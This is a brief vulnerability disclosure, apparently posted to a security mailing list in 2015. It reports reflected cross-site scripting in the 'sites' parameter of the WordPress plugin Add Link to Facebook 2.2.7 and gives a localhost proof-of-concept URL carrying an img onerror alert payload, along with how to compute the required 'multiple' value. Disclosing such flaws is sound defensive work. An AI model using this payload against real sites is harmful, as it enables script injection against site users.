Subject: Cross-Site Scripting (XSS) in Add Link to Facebook 2.2.7

Date: Thu, 13 Aug 2015 12:33:52 +0200

Hello,

Plugin: Add Link to Facebook 2.2.7 https://wordpress.org/plugins/add-link-to-facebook/

1. Cross-Site Scripting (XSS)

Authenticated users (like editors) can inject html/js code.

Method: GET

Url: http://localhost/wp-admin/admin.php?page=add-link-to-facebook&multiple=c9db569cb388e160e4b86ca1ddff84d7&sites=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

Vulnerable parameters: sites

Notes: multiple parameter in this url is equal to md5('http://localhost/'). More precisily it should be equal to md5(WPAL2Int::Redirect_uri()).

Example PHP callstack:

al2fb_render_admin [/add-link-to-facebook/add-link-to-facebook-admin.php:47]

Verification:

http://localhost/wp-admin/admin.php?page=add-link-to-facebook&multiple=c9db569cb388e160e4b86ca1ddff84d7&sites=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--

Regards,
Marcin Probola,